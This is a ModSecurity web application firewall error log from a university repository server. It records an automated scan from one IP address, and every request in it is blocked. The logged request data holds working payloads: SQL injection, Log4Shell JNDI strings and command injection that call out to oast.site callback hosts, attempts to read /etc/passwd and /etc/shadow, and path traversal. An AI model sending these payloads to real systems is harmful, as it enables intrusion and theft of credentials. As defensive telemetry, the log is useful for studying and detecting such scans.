[Tue Aug 29 11:34:00.427233 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAARy-5cAAAAb"]
[Tue Aug 29 11:34:01.586582 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASAHfsAAAAH"]
[Tue Aug 29 11:34:03.392794 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgt7rwofaerc6ue.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAAPLwFAAAAAX"]
[Tue Aug 29 11:34:04.409279 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgyq8aytfghn38q.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASUX0EAAAAd"]
[Tue Aug 29 11:34:06.409411 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASK4eEAAAAI"]
[Tue Aug 29 11:34:07.302049 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASI0AQAAAAG"]
[Tue Aug 29 11:34:07.328120 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAAR@KLUAAAAF"]
[Tue Aug 29 11:34:08.337545 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASVoHQAAAAe"]
[Tue Aug 29 11:34:08.369017 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASQqAAAAAAT"]
[Tue Aug 29 11:34:09.321078 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAAQKOsYAAAAs"]
[Tue Aug 29 11:34:09.329878 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASfNucAAAAg"]
[Tue Aug 29 11:34:10.356294 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASHh6MAAAAD"]
[Tue Aug 29 11:34:10.364736 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlg9fuck5een95ww.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASGMs4AAAAA"]
[Tue Aug 29 11:34:10.395448 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASMggMAAAAO"]
[Tue Aug 29 11:34:11.302939 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAAQKOs8AAAAs"]
[Tue Aug 29 11:34:11.380593 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgbr3zifg5o3u9t.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgbr3zifg5o3u9t.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgec8k1puoetr8o.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASHh6kAAAAD"]
[Tue Aug 29 11:34:12.402862 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAASQqBAAAAAT"]
[Tue Aug 29 11:34:13.314317 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASHh68AAAAD"]
[Tue Aug 29 11:34:15.325539 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgo9tfh6p6kteum.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgo9tfh6p6kteum.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAASHh7cAAAAD"]
[Tue Aug 29 11:34:15.368654 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASHh7kAAAAD"]
[Tue Aug 29 11:34:16.342763 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASI0B4AAAAG"]
[Tue Aug 29 11:34:16.347405 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repositoryfh.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAARjjWcAAAAL"]
[Tue Aug 29 11:34:16.347457 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAARjjWcAAAAL"]
[Tue Aug 29 11:34:16.371085 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAAPLwHQAAAAX"]
[Tue Aug 29 11:34:17.382963 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASS7-IAAAAY"]
[Tue Aug 29 11:34:19.312101 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAASGMu8AAAAA"]
[Tue Aug 29 11:34:19.352587 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASEJVQAAAAE"]
[Tue Aug 29 11:34:19.392436 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgou68s84txa7ao.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASI0CkAAAAG"]
[Tue Aug 29 11:34:23.215381 2023] [:error] [pid 1233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAATRZVMAAAAQ"]
[Tue Aug 29 11:34:23.660574 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASPDMAAAAAS"]
